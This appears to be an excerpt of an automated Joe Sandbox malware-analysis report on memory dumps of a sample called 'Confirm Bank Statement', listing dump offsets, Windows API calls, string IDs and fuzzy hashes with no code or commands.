                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1274399706.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7270000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: Teq$Teq
                                                                                              • API String ID: 0-2938103587
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1272556679.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_55b0000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: $
                                                                                              • API String ID: 0-227171996
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1272556679.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_55b0000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: $
                                                                                              • API String ID: 0-227171996
                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 0143B51E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1266699529.0000000001430000.00000040.00000800.00020000.00000000.sdmp, Offset: 01430000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_1430000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID: HandleModule
                                                                                              • String ID:
                                                                                              • API String ID: 4139908857-0
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1274399706.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7270000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 4'q
                                                                                              • API String ID: 0-1807707664
                                                                                              APIs
                                                                                              • CreateActCtxA.KERNEL32(?), ref: 01435DA9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1266699529.0000000001430000.00000040.00000800.00020000.00000000.sdmp, Offset: 01430000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_1430000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID: Create
                                                                                              • String ID:
                                                                                              • API String ID: 2289755597-0
                                                                                              APIs
                                                                                              • CreateActCtxA.KERNEL32(?), ref: 01435DA9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1266699529.0000000001430000.00000040.00000800.00020000.00000000.sdmp, Offset: 01430000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_1430000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID: Create
                                                                                              • String ID:
                                                                                              • API String ID: 2289755597-0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1274442520.0000000007280000.00000040.00000800.00020000.00000000.sdmp, Offset: 07280000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7280000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateFromIconResource
                                                                                              • String ID:
                                                                                              • API String ID: 3668623891-0
                                                                                              APIs
                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0143D76E,?,?,?,?,?), ref: 0143D82F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1266699529.0000000001430000.00000040.00000800.00020000.00000000.sdmp, Offset: 01430000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_1430000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID: DuplicateHandle
                                                                                              • String ID:
                                                                                              • API String ID: 3793708945-0
                                                                                              APIs
                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0143D76E,?,?,?,?,?), ref: 0143D82F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1266699529.0000000001430000.00000040.00000800.00020000.00000000.sdmp, Offset: 01430000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_1430000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID: DuplicateHandle
                                                                                              • String ID:
                                                                                              • API String ID: 3793708945-0
                                                                                              APIs
                                                                                              • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,0728A8A2,?,?,?,?,?), ref: 0728A947
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1274442520.0000000007280000.00000040.00000800.00020000.00000000.sdmp, Offset: 07280000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7280000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateFromIconResource
                                                                                              • String ID:
                                                                                              • API String ID: 3668623891-0
                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 0143B51E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1266699529.0000000001430000.00000040.00000800.00020000.00000000.sdmp, Offset: 01430000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_1430000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID: HandleModule
                                                                                              • String ID:
                                                                                              • API String ID: 4139908857-0
                                                                                              • Opcode ID: f8432281161c4cf02deb21c8bc05b6dddc468a3b52c5b98611997595b406e9e0
                                                                                              • Instruction ID: 52f76f4d574219059534715ffad3a47344b56cb3f5f87c242cdc9411b575ac1c
                                                                                              • Opcode Fuzzy Hash: f8432281161c4cf02deb21c8bc05b6dddc468a3b52c5b98611997595b406e9e0
                                                                                              • Instruction Fuzzy Hash: 301102B6C003498FDB10CF9AD444B9EFBF4EB88314F14841AD429A7350D379A545CFA1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1272556679.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_55b0000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: (q
                                                                                              • API String ID: 0-2414175341
                                                                                              • Opcode ID: fd7b7f23f714c215e2625ab35e0b275f9f26cb3ac49e4f5e7c3b1e48f480d652
                                                                                              • Instruction ID: e19ac61a601db804d50aae6b3108f2b12c191b8eb329053c3a7aab1e8c48c406
                                                                                              • Opcode Fuzzy Hash: fd7b7f23f714c215e2625ab35e0b275f9f26cb3ac49e4f5e7c3b1e48f480d652
                                                                                              • Instruction Fuzzy Hash: 8391DD71E01208DFDB18DFA5E848AEEBBF6FF89300F14846AE456A7350DB749805CB91
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1272556679.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_55b0000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: @
                                                                                              • API String ID: 0-2766056989
                                                                                              • Opcode ID: f4c179b6ce5342db279caf4bf34d0ccbc44bac1d3c3ab134b4aac6941f70b01f
                                                                                              • Instruction ID: 6ed4f215ac9e7d797adc17133f6b3cd306b30fa451bb405c346a5e4c5b42939e
                                                                                              • Opcode Fuzzy Hash: f4c179b6ce5342db279caf4bf34d0ccbc44bac1d3c3ab134b4aac6941f70b01f
                                                                                              • Instruction Fuzzy Hash: 62D10D3590020ACFDF05DFA8D8989EDF7B5FF48314B148A59D8166B259DB70AA89CFC0
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1272556679.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_55b0000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID: 0-3916222277
                                                                                              • Opcode ID: 480fc167d664e9c440526436778dd3de0bd8687ba088a722ac6e6762dd341030
                                                                                              • Instruction ID: 4ca6815113b501988523c50db33af7a8654b3a27aaea4b05b2a8c2e8c5146e7d
                                                                                              • Opcode Fuzzy Hash: 480fc167d664e9c440526436778dd3de0bd8687ba088a722ac6e6762dd341030
                                                                                              • Instruction Fuzzy Hash: 68B1203590024ACFCF05DFA8C8848D9F7B1FF48314B148A59D816AB259D770EA9ACF80
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1274399706.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7270000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: (q
                                                                                              • API String ID: 0-2414175341
                                                                                              • Opcode ID: b65d25427b3c071ccccd046a28d8a20af494385d0f36011bc3770d06ddde08e2
                                                                                              • Instruction ID: 32dbb4dfb50dd407cc570fa83652781edc0cbcc58857198ff8479ce1430d3367
                                                                                              • Opcode Fuzzy Hash: b65d25427b3c071ccccd046a28d8a20af494385d0f36011bc3770d06ddde08e2
                                                                                              • Instruction Fuzzy Hash: 5C71C3B1A103069FE734DB65D954BAEBBE6EFC4201F14882DE8069B290DF749C49CB51
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1274399706.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7270000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 8q
                                                                                              • API String ID: 0-4083045702
                                                                                              • Opcode ID: 424946adc0d8efd75fc7becadd76f68f3c40c382cf669c1b942d5ac8b6c77c16
                                                                                              • Instruction ID: 3a5b75e8a39fe136ccf20a39d715905355b3752727fe2fc7381c879811192128
                                                                                              • Opcode Fuzzy Hash: 424946adc0d8efd75fc7becadd76f68f3c40c382cf669c1b942d5ac8b6c77c16
                                                                                              • Instruction Fuzzy Hash: E03103B0E21209DBCB04CFAAE5846EEFBB6FF89310F109029E815A7354DB745951CF94
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1274399706.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7270000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 8q
                                                                                              • API String ID: 0-4083045702
                                                                                              • Opcode ID: 752ec770b9dce861f76783af4d2565c9c6cf902eb616b126d7cefc41b631571a
                                                                                              • Instruction ID: 3f2be296cdc580fd2f1ada18d53142e24981f93b2562cba65fcf260e37257a4a
                                                                                              • Opcode Fuzzy Hash: 752ec770b9dce861f76783af4d2565c9c6cf902eb616b126d7cefc41b631571a
                                                                                              • Instruction Fuzzy Hash: 7F3132B0E25209DFCB04CFAAE6846EEFBB2FB89300F10906AE815A7254D7B45951CF54
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1274399706.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7270000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: Teq
                                                                                              • API String ID: 0-1098410595
                                                                                              • Opcode ID: 2a48fbc90393e6bb39f8479dc6dc3358532e1fa06f02c3b47510a852b870b9fb
                                                                                              • Instruction ID: 5f65896c263f48696aa3a2f8e0ecd125a2f4ca82ed9fd197cbefed439e1dc6da
                                                                                              • Opcode Fuzzy Hash: 2a48fbc90393e6bb39f8479dc6dc3358532e1fa06f02c3b47510a852b870b9fb
                                                                                              • Instruction Fuzzy Hash: 9F21BFB4E10219CFDB08CFE9C9809EDBBB2FB8D314F20812AD919AB355C7356946CB50
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1274399706.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7270000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: aed9266f24e97d176086766dd08a3604d5170a22cfcae14328b702b298b29f3b
                                                                                              • Instruction ID: ebccbeb672b18690c028027f4a81e81c910508e86ce711fd7fee4c30fef75ba3
                                                                                              • Opcode Fuzzy Hash: aed9266f24e97d176086766dd08a3604d5170a22cfcae14328b702b298b29f3b
                                                                                              • Instruction Fuzzy Hash: CD81FEB0D2562DCFDB24CFA5CA45BEDBBB5BB0A304F1090A9D109B7241DBB41A85CF01
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1272556679.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                                                              • Snapshot File: hcaresult_0_2_55b0000_Confirm Bank Statement.jbxd
                                                                                              • API String ID:
                                                                                              • Opcode ID: febe2f9fb6d2f8f32f28fa6238153359438952ad16860e4959d3f4bf64f3f0f3
                                                                                              • Instruction ID: aa666102e5bf17d06c586a2778400b3a225aeeeb7cf3d0ba19d192817ebb5fd9
                                                                                              • Opcode Fuzzy Hash: febe2f9fb6d2f8f32f28fa6238153359438952ad16860e4959d3f4bf64f3f0f3
                                                                                              • Instruction Fuzzy Hash: CF416CB0A1124ADFDB14DFA8D954A9DBBF2FF89310F148169E441FB3A1DB71A841CB90
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1274399706.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7270000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 594796dd4dc1c9d5100fdde610d258b277d4331b14d490ed2e7c056825d90fa6
                                                                                              • Instruction ID: 6d1487cb97cf1df4fdcec836035f17268d2a2fd3575d4e207f4307966d0b67d2
                                                                                              • Opcode Fuzzy Hash: 594796dd4dc1c9d5100fdde610d258b277d4331b14d490ed2e7c056825d90fa6
                                                                                              • Instruction Fuzzy Hash: D3414CB0A21209DFDB14EFA8D954A9DBBF6BF89310F148169E441FB3A0DB71AD41CB50
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1274399706.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7270000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 7c402885b67a496b2351d44269f74f9d6bc093884813563d11ec0153ff351eea
                                                                                              • Instruction ID: 1835f54b04763610a2ef4f10f6efb5ebb4e418be437b159e536a4cc1d3399a43
                                                                                              • Opcode Fuzzy Hash: 7c402885b67a496b2351d44269f74f9d6bc093884813563d11ec0153ff351eea
                                                                                              • Instruction Fuzzy Hash: A84151B1F11205CFDB24DF69C698AADBBF2EF88311F188069E405AB360DB719D45CB50
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1272556679.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_55b0000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: d76ec7e8cc8b048543809496a5e703a836c37ee94c557b15d6258932da411164
                                                                                              • Instruction ID: 6ea0b4c8faba66133f859096abf748c9dbd19221139dcb5acb97ca16b7f0f434
                                                                                              • Opcode Fuzzy Hash: d76ec7e8cc8b048543809496a5e703a836c37ee94c557b15d6258932da411164
                                                                                              • Instruction Fuzzy Hash: 3E413C30B00219DFDF19DBADD4886EEB7F2BF88204F154A29E106EB741DBB49941CB91
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1274399706.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7270000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 697a1e4b4a30518231d2742be7fc543edbca1e3c8499c8513340be91d1c5bc56
                                                                                              • Instruction ID: 740709579c3531505f4a89575aca47755a77a6af9b3188d1591c8c04db115a5f
                                                                                              • Opcode Fuzzy Hash: 697a1e4b4a30518231d2742be7fc543edbca1e3c8499c8513340be91d1c5bc56
                                                                                              • Instruction Fuzzy Hash: AE416DB4D65249CFCB10DFA4D5896AEBFF5FF0A311F10902AE916AB240DB742945CF41
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1272556679.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_55b0000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 180c6465abc99d2aefcea01a41a89e6cad046d281cb2b28997fd7bdf01855889
                                                                                              • Instruction ID: f8ecce67e71bf59515341552d76ce21589d2eb913231881c66ab2376386c8d05
                                                                                              • Opcode Fuzzy Hash: 180c6465abc99d2aefcea01a41a89e6cad046d281cb2b28997fd7bdf01855889
                                                                                              • Instruction Fuzzy Hash: 15414F34A1070ACFDB04EF78C8949DDBBB6FF89304F108559E115AB325EB71A945CB81
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1272556679.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_55b0000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 213c5feded0377ed0075cf4072d3c839a27976826e1a020c9475e147d230b7bf
                                                                                              • Instruction ID: f173ed381c127a5c32d93efff621d361c698914332494ae4feddbccc0588a667
                                                                                              • Opcode Fuzzy Hash: 213c5feded0377ed0075cf4072d3c839a27976826e1a020c9475e147d230b7bf
                                                                                              • Instruction Fuzzy Hash: FC412C34A1070ACFCB04EF68C8849DDBBB6FF89304F108559E519AB365EB71A946CB81
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1274399706.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7270000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: c1b9e849f8364a85196d1137417aa049091356ad740d6712d967807aee4be149
                                                                                              • Instruction ID: 9b52136cf31e671ef9db6b1c04f5637f05d1f6bd2d6363c77956b5eb1a65f595
                                                                                              • Opcode Fuzzy Hash: c1b9e849f8364a85196d1137417aa049091356ad740d6712d967807aee4be149
                                                                                              • Instruction Fuzzy Hash: 044144B0D25219CFDB04CFA9CA406EEBBB6FF89312F109429E405AB350DBB55940CFA0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1272556679.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_55b0000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: be0eddada9caf4a2c11340319f2ad728d6caca6e44b3f863ce54b915e4d5307f
                                                                                              • Instruction ID: 543f664f9761d3c5fcd685accecf563fd9153da8c7d2575652c1f8dd0da51b9b
                                                                                              • Opcode Fuzzy Hash: be0eddada9caf4a2c11340319f2ad728d6caca6e44b3f863ce54b915e4d5307f
                                                                                              • Instruction Fuzzy Hash: 5841F3B1D00309CBEB20DFA9C988ADDFBF5BF49304F648529D408AB200D7756A4ACF91
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1274399706.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7270000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 4a00b65e750da5ed20c3c0d1f4b89d83851120a287b6340569fe684b8bc5e22a
                                                                                              • Instruction ID: 0818c9451fd0d0fc2b70c43ecf199dda0f0a2042fadb6438ed4772c2617b79a2
                                                                                              • Opcode Fuzzy Hash: 4a00b65e750da5ed20c3c0d1f4b89d83851120a287b6340569fe684b8bc5e22a
                                                                                              • Instruction Fuzzy Hash: F33131F0F20117CFCB213B64CA4867EBFB4EB80248F6544A9D18277294D631CD29CB92
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1272556679.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_55b0000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 163e042af90a76f761594782087ae333ddc80fcdec7be1cc75e640ca05b736c9
                                                                                              • Instruction ID: 0da9457902fe3c440bb618fe22dbc3e586c5e1118e83bdfa965a2de358d54059
                                                                                              • Opcode Fuzzy Hash: 163e042af90a76f761594782087ae333ddc80fcdec7be1cc75e640ca05b736c9
                                                                                              • Instruction Fuzzy Hash: DD41C2B1D0030DCBEB20DFA9C588ADDFBB5BF49304F648529D409AB200D7B56A4ACF91
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1272556679.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_55b0000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: b5552f5a002eea8bee76aac63157df887bc436cae2c8bba56d16eb00045708b3
                                                                                              • Instruction ID: d875f188ff6a404ffdfb538356a334bd87bac3a8609ac09b6737a2176766f266
                                                                                              • Opcode Fuzzy Hash: b5552f5a002eea8bee76aac63157df887bc436cae2c8bba56d16eb00045708b3
                                                                                              • Instruction Fuzzy Hash: 2341E875A0020ADFCB44DF69D88499EFBB5FF89310B15C669E918AB311E730E985CF90
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1272556679.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_55b0000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 8baea8769afe8f3f8a591220b5f89618373bf5b68705b7035e107ebab21f3015
                                                                                              • Instruction ID: f1cefa49602a502bdcd2c8613743e19f1675babc9e3276fa5fa3241b107c5479
                                                                                              • Opcode Fuzzy Hash: 8baea8769afe8f3f8a591220b5f89618373bf5b68705b7035e107ebab21f3015
                                                                                              • Instruction Fuzzy Hash: F1410A75A042068FD714CF68C584AA9FBF1FF49310B1986A9D84ADB361D774EC45CF90
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1274399706.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7270000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: f17e506edaa0844aa027a724e4d90287f26467776a6ed274cbaf2e1146066b2c
                                                                                              • Instruction ID: 115872fb87e80f33180447457d26d1e69a68ffc49760a992b04364a31b367a9c
                                                                                              • Opcode Fuzzy Hash: f17e506edaa0844aa027a724e4d90287f26467776a6ed274cbaf2e1146066b2c
                                                                                              • Instruction Fuzzy Hash: 724153B0D2521ACFDB04CFA9CA446EEBBB2FF4A312F04846AD411AB361D7B54944CF91
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1272556679.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_55b0000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: c48c4c6f4ac0501f8a4647058236e03656432c8039ef702b5eda70ac4ef353be
                                                                                              • Instruction ID: 6867ac135bff43274d83cda39a8d0beb119c7c8ee3a19a3d52cb5e0108e3a548
                                                                                              • Opcode Fuzzy Hash: c48c4c6f4ac0501f8a4647058236e03656432c8039ef702b5eda70ac4ef353be
                                                                                              • Instruction Fuzzy Hash: FB41ACB4D003589BDB14CF9AD888ADEBBB5BF49310F20822AE419AB254DBB55845CF94
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1272556679.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_55b0000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 8a0a8a23bf744cce26cc75def9e6fd01dd938e025ec0c7d2065189786da544fa
                                                                                              • Instruction ID: 3b984af538f5edf8f77b181d6991acd1c60d10ed5e834e271c20dc8b8af44754
                                                                                              • Opcode Fuzzy Hash: 8a0a8a23bf744cce26cc75def9e6fd01dd938e025ec0c7d2065189786da544fa
                                                                                              • Instruction Fuzzy Hash: 6B31DF35E01305CBEB04EF69D898691BBB6FF88214F098979E9096F241EF74A484CB61
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1272556679.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Instruction ID: 9ddc16c74f5757b1086f6fe430fd25d6d909d5ad4ae2d0f345116b7b40bbc929
                                                                                              • Opcode Fuzzy Hash: 4d4d10fa4f9dbb2000d261ccb3067979a4a793c0ff180590da859441d480c42f
                                                                                              • Instruction Fuzzy Hash: 71212CB4929219CFDB10DF98D685AEDBBBAFF0A300F509295D44AA7242C374A8C1CF51
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1274399706.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7270000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: a4b2865f631153b899e6b37d7c3b7e04268c86a14782f229fdc8db18605891bc
                                                                                              • Instruction ID: 0c64f6736d169a4d1422497cf3be3d426546b786c239e9528b18878b5b2a8c96
                                                                                              • Opcode Fuzzy Hash: a4b2865f631153b899e6b37d7c3b7e04268c86a14782f229fdc8db18605891bc
                                                                                              • Instruction Fuzzy Hash: 3631A3B4E152099FCB04DF99D594AEDBBF1EF49310F108029E915A7360DB74A942CFA4
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1272556679.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_55b0000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
